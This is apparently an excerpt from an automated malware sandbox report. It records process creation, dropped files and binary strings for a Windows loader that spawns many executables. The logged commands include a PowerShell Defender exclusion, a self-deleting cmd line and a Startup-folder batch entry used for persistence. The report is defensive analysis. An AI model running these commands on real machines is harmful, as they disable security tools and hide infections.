                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeString found in binary or memory: inateProcessTor current modeTor is dowloadedTranslateMessageTrustedInstallerUnregisterClassWUpgrade RequiredUser-Agent: %s VirtualProtectExWinVerifyTrustExWindows DefenderWww-AuthenticateXOR-PEER-ADDRESSZanabazar_Square\windefender.exe runtime stack: address
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeString found in binary or memory: unknown network unpacking headerworkbuf is emptywrite config: %wwww-authenticate spinningthreads=%%!%c(big.Int=%s)%s/address/%s/txs, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method AdjustToke
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeString found in binary or memory: Temporary RedirectTerminateJobObjectTime.MarshalJSON: Time.MarshalText: UNKNOWN-ATTRIBUTESUNKNOWN_SETTING_%dUnknown value typeVariation_SelectorWeb Downloader/6.9WriteProcessMemoryXOR-MAPPED-ADDRESSadaptivestackstartbad Content-Lengthbad manualFreeListbufio: b
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeString found in binary or memory: .654WDG_Validator/1.6.2WSALookupServiceEndWaitForSingleObjectWindowsCreateStringWindowsDeleteStringWinmonSystemMonitorXOR-RELAYED-ADDRESSYukon Standard Timeadjusttimers: bad pafter array elementattribute not foundbad ABI descriptionbad file descriptorbad kind
                  Source: unknownProcess created: C:\Users\user\Desktop\dl7WL77rkA.exe C:\Users\user\Desktop\dl7WL77rkA.exe
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3876 -s 134468
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe "C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe "C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe "C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe"
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeProcess created: C:\Users\user\AppData\Local\Temp\syncUpd.exe C:\Users\user\AppData\Local\Temp\syncUpd.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe "C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe "C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe "C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe "C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe "C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe "C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe"
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeProcess created: C:\Users\user\AppData\Local\Temp\wfplwfs.exe C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exe "C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exe "C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe "C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe "C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe "C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe "C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe"
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe "C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exe "C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe "C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe "C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exe "C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe "C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe"
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\wfplwfs.exe C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
                  Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://hentaitoonami.com/
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2216,i,3713958764592762144,12864230647668828489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6V1VrzZlnckbDLDx3vI2CQTI.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeProcess created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6V1VrzZlnckbDLDx3vI2CQTI.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -ForceJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe "C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe "C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe "C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe "C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe "C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe "C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe "C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe "C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe "C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exe "C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exe "C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe "C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe "C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe "C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe "C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe "C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exe "C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe "C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe "C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exe "C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe "C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe"
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeProcess created: C:\Users\user\AppData\Local\Temp\wfplwfs.exe C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe"
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeProcess created: C:\Users\user\AppData\Local\Temp\syncUpd.exe C:\Users\user\AppData\Local\Temp\syncUpd.exe
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeProcess created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2216,i,3713958764592762144,12864230647668828489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Google Drive.lnk.42.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: YouTube.lnk.42.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Sheets.lnk.42.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Gmail.lnk.42.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Slides.lnk.42.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: Docs.lnk.42.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeWindow found: window name: TButton
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: dl7WL77rkA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: dl7WL77rkA.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: dl7WL77rkA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: Loader.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: EfiGuardDxe.pdb7 source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3275239614.0000000001202000.00000040.00000020.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3187282898.0000000001170000.00000040.00000020.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3269213397.0000000001022000.00000040.00000020.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3245748971.000000000110C000.00000040.00000020.00020000.00000000.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmp
                  Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
